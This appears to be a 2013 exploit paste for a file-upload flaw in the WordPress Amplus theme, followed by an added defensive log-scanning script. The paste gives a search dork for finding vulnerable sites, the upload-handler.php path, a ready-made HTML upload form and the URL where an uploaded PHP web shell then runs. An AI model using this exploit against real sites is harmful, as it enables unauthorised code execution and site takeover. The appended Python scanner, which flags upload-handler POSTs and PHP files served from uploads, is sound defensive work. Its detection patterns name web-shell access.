Googleinurl

EXPLOIT Wordpress Amplus Theme - CSRF Vulnerability

Nov 18th, 2013
#Vulnerability : CSRF

#Dork :

inurl:wp-content/themes/amplus


CSRF File Upload Vulnerability

Exploit & POC :

http://site-target/wp-content/themes/amplus/functions/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>


File Access :

http://site-target/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
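
Added example (not part of the original paste): a log check a site owner can run to find requests matching the two URLs above, i.e. POSTs to the theme's upload-handler.php and PHP files later served from an uploads directory. The log lines, host names and sample.php are constructed, and the combined log format and the function name find_suspicious are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample access-log lines (combined log format); all values are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Nov/2013:10:01:02 +0000] "POST /wp-content/themes/amplus/functions/upload-handler.php HTTP/1.1" 200 31 "http://other.example/page.html" "Mozilla/5.0"
203.0.113.7 - - [18/Nov/2013:10:01:09 +0000] "GET /wp-content/uploads/2013/11/sample.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [18/Nov/2013:10:02:00 +0000] "GET /wp-content/uploads/2013/11/logo.png HTTP/1.1" 200 2048 "http://blog.example/" "Mozilla/5.0"
198.51.100.4 - - [18/Nov/2013:10:03:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "http://blog.example/wp-admin/" "Mozilla/5.0"
"""

# ip, timestamp, method, path, status, referer
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"')
HANDLER = "/wp-content/themes/amplus/functions/upload-handler.php"
# Executable PHP extensions requested under any .../uploads/ path, dated or not.
SCRIPT_IN_UPLOADS = re.compile(
    r"/uploads/(?:\d{4}/\d{2}/)?[^/?]+\.(?:php\d?|phtml|phar)(?:$|[?/])", re.I)

def find_suspicious(log_text, site_host):
    """Return (timestamp, ip, reason, path) tuples for requests worth reviewing."""
    findings, uploaders = [], set()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, method, path, status, referer = m.groups()
        bare = path.split("?", 1)[0]
        if method == "POST" and bare == HANDLER:
            # A form hosted elsewhere (or no referer at all) fits the paste's scenario.
            offsite = urlparse(referer).hostname != site_host
            uploaders.add(ip)
            findings.append((ts, ip, "upload-handler POST"
                             + (" (referer not from site)" if offsite else ""), path))
        elif SCRIPT_IN_UPLOADS.search(path) and status.startswith("2"):
            tag = "script served from uploads" + (" by uploader IP" if ip in uploaders else "")
            findings.append((ts, ip, tag, path))
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG, "blog.example"):
        print(*finding, sep="  ")
```

WordPress media uploads are not normally PHP files, so hits on the second pattern are worth reviewing even without a preceding POST.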